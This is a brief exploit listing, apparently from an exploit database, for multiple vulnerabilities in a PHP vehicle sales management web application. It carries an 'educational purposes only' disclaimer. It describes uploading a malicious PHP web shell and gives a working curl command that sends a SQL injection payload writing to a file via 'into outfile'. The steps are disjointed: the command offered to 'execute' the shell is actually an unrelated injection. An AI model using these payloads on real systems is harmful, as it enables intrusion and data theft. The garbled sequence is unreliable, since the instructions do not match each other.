Vehicle sales management system multiple vulnerabilities Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-03-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Vehicle sales management system multiple vulnerabilities is for educational purposes only and if it is used you will do on your own risk!
The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads. Now, browse to the location and note the file name. In my vase it's 1510529218getShell.php. To execute it do
curl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d "username=employee@employee.com' union select 'SQLIIII' into outfile'/tmp/stuff.txt"